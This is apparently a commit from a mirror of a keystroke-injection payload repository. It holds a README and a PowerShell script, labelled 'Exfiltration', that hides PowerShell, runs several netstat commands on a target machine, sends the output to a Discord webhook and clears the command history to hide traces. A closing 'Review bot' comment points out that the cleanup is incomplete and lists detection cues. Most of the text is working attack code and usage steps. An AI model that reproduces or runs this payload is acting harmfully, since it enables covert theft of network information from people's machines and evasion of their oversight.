mirror of https://github.com/hak5/omg-payloads.git
readme
parent
5d2c65387b
commit
83f97b85cc
|
@ -0,0 +1,41 @@
|
|||
# Windows netstat ✅
|
||||
|
||||
A script used to stole target netstat status.
|
||||
|
||||
**Category**: Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
This script will stole target netstat status.
|
||||
|
||||
Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||
|
||||
Then it cleans up traces of what you have done after.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* An internet connection
|
||||
* Windows 10,11
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke the indicated commands
|
||||
* Invoke-WebRequest will be entered in the Run Box to send the content
|
||||
|
||||
### Settings
|
||||
Put 1 on the function that you want to active, else 0.
|
||||
Functions available:
|
||||
- default (*or simple 'netstat' command*)
|
||||
- routing_table **$r**
|
||||
- listening_canonical **$lc**
|
||||
- listening_numerical **$ln**
|
||||
- all_canonical **$ac**
|
||||
- all_numerical **$an**
|
||||
- offload **ot**
|
||||
- proto **$p "\<protocol>"**
|
||||
- *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".*
|
||||
|
||||
|
|
@ -0,0 +1,79 @@
|
|||
|
||||
# Discord send function
|
||||
function exfiltration () {
|
||||
param(
|
||||
[Parameter (Mandatory = $true, Position=0)] [String]$command,
|
||||
[Parameter (Mandatory = $true, Position=1)] [String]$text
|
||||
)
|
||||
# Loop for Discord
|
||||
$ConstantLimitForRestMethod = 1999
|
||||
$TMP_Body = @{
|
||||
'username' = $command
|
||||
'content' = ""
|
||||
}
|
||||
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
|
||||
try {
|
||||
$TMP_Body = @{
|
||||
'username' = $command
|
||||
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
|
||||
}
|
||||
} catch [ArgumentOutOfRangeException] {
|
||||
if($text.Length-$i -gt 0){
|
||||
$TMP_Body = @{
|
||||
'username' = $command
|
||||
'content' = $text.Substring($i, $text.Length-$i)
|
||||
}
|
||||
} else {
|
||||
break
|
||||
}
|
||||
}
|
||||
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($TMP_Body | ConvertTo-Json)
|
||||
}
|
||||
}
|
||||
|
||||
# send command format
|
||||
function send_command(){
|
||||
param(
|
||||
[Parameter (Mandatory = $true, Position=0)] [String]$cmd
|
||||
)
|
||||
$out = Invoke-Expression $cmd
|
||||
(exfiltration $cmd [string]$out)
|
||||
}
|
||||
|
||||
# Settings
|
||||
if ( $d -eq "1") {
|
||||
$cmd = "netstat"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $r -eq "1") {
|
||||
$cmd = "netstat -r"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $lc -eq "1") {
|
||||
$cmd = "netstat -af"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $ln -eq "1") {
|
||||
$cmd = "netstat -an"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $ac -eq "1") {
|
||||
$cmd = "netstat -qf"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $an -eq "1") {
|
||||
$cmd = "netstat -qn"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $o -eq "1") {
|
||||
$cmd = "netstat -t"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $p -ne "" ) {
|
||||
# format $proto="TCP"
|
||||
$cmd = "netstat -ps " + $p
|
||||
(send_command $cmd)
|
||||
}
|
||||
|
||||
# Clear the PowerShell command history
|
||||
Clear-History
|
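Review bot: The closing `Clear-History` does not back the README's statement that the script cleans up its traces. It empties only the current session's history list, so PSReadLine's saved history file, script block logging (event 4104, where enabled) and process-creation records for the `netstat` children are unaffected. The comment above it should say so, e.g. `# Clears this session's history list only; PSReadLine history and script block logs are not touched`. For detection, the observable behaviour in this section is a PowerShell process running several `netstat` variants through `Invoke-Expression` and then sending `Invoke-RestMethod` POSTs of at most 1999 characters each to the URL in `$discord`. Neither `$discord` nor the switch variables (`$d`, `$r`, `$lc`, `$p`, …) are defined in this file, so they are presumably set by the launching command line, which is where the webhook URL would appear in command-line logging.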